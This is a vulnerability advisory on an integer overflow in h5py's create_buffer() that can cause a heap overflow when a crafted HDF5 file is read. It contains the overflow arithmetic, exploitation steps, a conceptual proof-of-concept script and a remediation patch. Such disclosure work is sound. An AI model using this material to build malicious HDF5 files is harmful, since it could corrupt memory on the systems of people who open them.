h5py-filter-plugin-rce-poc / h5py-02-create-buffer-integer-overflow.md

Integer Overflow in Proxy Buffer Allocation Leading to Heap Buffer Overflow

Target

  • Project: h5py/h5py
  • URL: https://github.com/h5py/h5py
  • Component: _proxy.templ.pyx - create_buffer() function
  • CWE: CWE-190 (Integer Overflow or Wraparound), CWE-122 (Heap-based Buffer Overflow)

Severity: HIGH

Summary

The create_buffer() function in h5py/h5py/_proxy.templ.pyx computes the buffer size as size * npoints (where both are size_t) without checking for integer overflow. When a crafted HDF5 file specifies a dataset with a very large type size or number of points, the multiplication can wrap around, causing malloc() to allocate a much smaller buffer than expected. Subsequent H5Dread() or H5Tconvert() operations then write past the end of this undersized buffer, resulting in a heap buffer overflow.

Vulnerable Code

File: h5py/h5py/_proxy.templ.pyx (lines 294-308)

cdef void* create_buffer(size_t ipt_size, size_t opt_size, size_t nl) except NULL:

    cdef size_t final_size
    cdef void* buf

    if ipt_size >= opt_size:
        final_size = ipt_size*nl      # <-- INTEGER OVERFLOW: no bounds check
    else:
        final_size = opt_size*nl      # <-- INTEGER OVERFLOW: no bounds check

    buf = malloc(final_size)
    if buf == NULL:
        raise MemoryError("Failed to allocate conversion buffer")

    return buf
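The unchecked multiplication above can be modeled in Python by masking to 64 bits (a sketch assuming an LP64 `size_t`; `create_buffer_size` is a hypothetical stand-in for the Cython function, not an h5py API):

```python
# size_t arithmetic wraps modulo 2**64 on 64-bit platforms
SIZE_T_MASK = 2**64 - 1

def create_buffer_size(ipt_size: int, opt_size: int, nl: int) -> int:
    """Mirror create_buffer()'s size computation, with C-style wraparound."""
    elem_size = ipt_size if ipt_size >= opt_size else opt_size
    return (elem_size * nl) & SIZE_T_MASK  # wraps silently, as in C

# A 65536-byte compound type with 2**48 + 1 selected points:
print(create_buffer_size(65536, 8, 2**48 + 1))  # 65536 — only 64 KiB allocated
```

A buffer of 65536 bytes is allocated, while the read path expects to fill roughly 2^64 bytes.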

Callers (all in the same file):

Line 53 (attribute read/write proxy):

conv_buf = create_buffer(asize, msize, npoints)

Line 60:

back_buf = create_buffer(msize, asize, npoints)

Line 137 (dataset read/write proxy):

conv_buf = create_buffer(H5Tget_size(dstype), H5Tget_size(mtype), npoints)

Line 146:

back_buf = create_buffer(H5Tget_size(dstype), H5Tget_size(mtype), npoints)

Line 210 (vlen string read/write):

conv_buf = create_buffer(H5Tget_size(dstype), H5Tget_size(h5_vlen_string), npoints)

The overflow scenario:

The values ipt_size / opt_size come from H5Tget_size() which returns the size of the HDF5 datatype as stored in the file. The value nl (npoints) comes from H5Sget_select_npoints() which returns the number of selected elements in the dataspace. Both are controlled by the contents of the HDF5 file.

On a 64-bit system, if ipt_size = 0x100000001 (4 GiB + 1, achievable with a compound type containing many members) and nl = 0x100000000 (2^32 points), then:

final_size = 0x100000001 * 0x100000000 = 0x10000000100000000

This exceeds 64-bit size_t, so the stored result wraps to 0x100000000 (4 GiB) — far smaller than the amount of data the subsequent H5Dread() expects to write, so the read overflows the heap buffer.

Even on 64-bit, more practical cases exist with compound types. For example, a compound type of size 65536 bytes with 281474976710656 (2^48) points gives 65536 * 2^48 = 2^64, wrapping to exactly 0; malloc(0) may return NULL (caught by the check) or a minimal allocation. Values slightly above 2^48 wrap to small positive sizes that pass the NULL check.
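For a given element size, the smallest number of points that wraps the 64-bit multiplication can be computed directly (a sketch; `min_wrapping_npoints` is a hypothetical helper for illustration, not part of h5py):

```python
def min_wrapping_npoints(elem_size: int, bits: int = 64) -> int:
    """Smallest npoints such that elem_size * npoints reaches 2**bits."""
    return -(2**bits) // -elem_size   # ceiling division: ceil(2**bits / elem_size)

n = min_wrapping_npoints(65536)
print(n)                          # 281474976710656, i.e. 2**48
print((65536 * n) % 2**64)        # 0 — the product wraps exactly to zero
print((65536 * (n + 1)) % 2**64)  # 65536 — a "valid-looking" tiny size
```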

On 32-bit systems this is trivially exploitable:

  • Type size: 65536 (compound type)
  • npoints: 65537
  • Product: 65536 * 65537 = 4,295,032,832, which wraps to 65536 in a 32-bit size_t
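These 32-bit figures can be checked with a quick sketch that masks to the low 32 bits to emulate a 32-bit size_t:

```python
# Emulate 32-bit size_t arithmetic by masking to the low 32 bits
MASK32 = 2**32 - 1

product = 65536 * 65537   # exact product as an unbounded Python int
print(product)            # 4295032832
print(product & MASK32)   # 65536 — the size malloc() actually receives
```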

Exploitation

  1. Craft an HDF5 file with:
    • A compound datatype with many fields to inflate H5Tget_size()
    • A dataspace with dimensions chosen so npoints times type_size overflows size_t
  2. Open the file with h5py and read the dataset
  3. The proxy code path is triggered when the dataset type requires conversion (compound types, vlen types, references)
  4. create_buffer() allocates a small buffer due to the overflow
  5. H5Dread() writes past the end of the buffer, corrupting the heap

Proof of Concept (conceptual):

import h5py
import numpy as np

# On a 32-bit system or with carefully chosen values on 64-bit:
# Create a file with a large compound type + many elements
# such that type_size * npoints overflows size_t

# The proxy buffer is used when compound type conversion is needed,
# so the file's compound type must differ from the memory type
# (e.g., different field ordering or extra fields)

with h5py.File('overflow.h5', 'w') as f:
    # Create compound dtype with large total size
    fields = [(f'field_{i}', 'f8') for i in range(8192)]  # 65536 bytes
    dt = np.dtype(fields)

    # On 32-bit: 65536 * 65537 wraps to 65536
    # Create dataset with 65537 elements
    f.create_dataset('data', shape=(65537,), dtype=dt)

# Reading back triggers the proxy path when type conversion is needed
# (e.g. a differing in-memory layout, or vlen/reference members)
with h5py.File('overflow.h5', 'r') as f:
    # The read reaches create_buffer() with the overflowing size
    data = f['data'][:]  # Heap overflow occurs here

Impact

  • Heap buffer overflow: Can corrupt heap metadata, potentially leading to arbitrary code execution
  • Denial of Service: Crash via heap corruption or segfault
  • Triggered by simply reading a crafted HDF5 file with h5py
  • The compound type conversion proxy path is commonly used when reading HDF5 files created by different software versions or with different field orderings

Remediation

Add overflow checking to create_buffer():

cdef void* create_buffer(size_t ipt_size, size_t opt_size, size_t nl) except NULL:
    cdef size_t final_size
    cdef size_t elem_size
    cdef void* buf

    elem_size = ipt_size if ipt_size >= opt_size else opt_size

    # Check for overflow before multiplication
    if nl != 0 and elem_size > (<size_t>-1) / nl:
        raise OverflowError("Buffer size calculation would overflow")

    final_size = elem_size * nl

    buf = malloc(final_size)
    if buf == NULL:
        raise MemoryError("Failed to allocate conversion buffer")

    return buf
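The same guard can be modeled in Python to confirm it rejects the crafted inputs (a sketch assuming 64-bit size_t; `checked_buffer_size` is illustrative, not the actual Cython function):

```python
SIZE_T_MAX = 2**64 - 1  # assumption: 64-bit size_t

def checked_buffer_size(ipt_size: int, opt_size: int, nl: int) -> int:
    """Mirror the patched create_buffer(): check before multiplying."""
    elem_size = ipt_size if ipt_size >= opt_size else opt_size
    if nl != 0 and elem_size > SIZE_T_MAX // nl:
        raise OverflowError("Buffer size calculation would overflow")
    return elem_size * nl

print(checked_buffer_size(65536, 8, 1024))   # 67108864 — passes the check
try:
    checked_buffer_size(65536, 8, 2**48 + 1) # would have wrapped in C
except OverflowError as e:
    print(e)                                 # Buffer size calculation would overflow
```

The division-based check is the standard pre-multiplication test; C code with GCC/Clang could equivalently use `__builtin_mul_overflow`.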
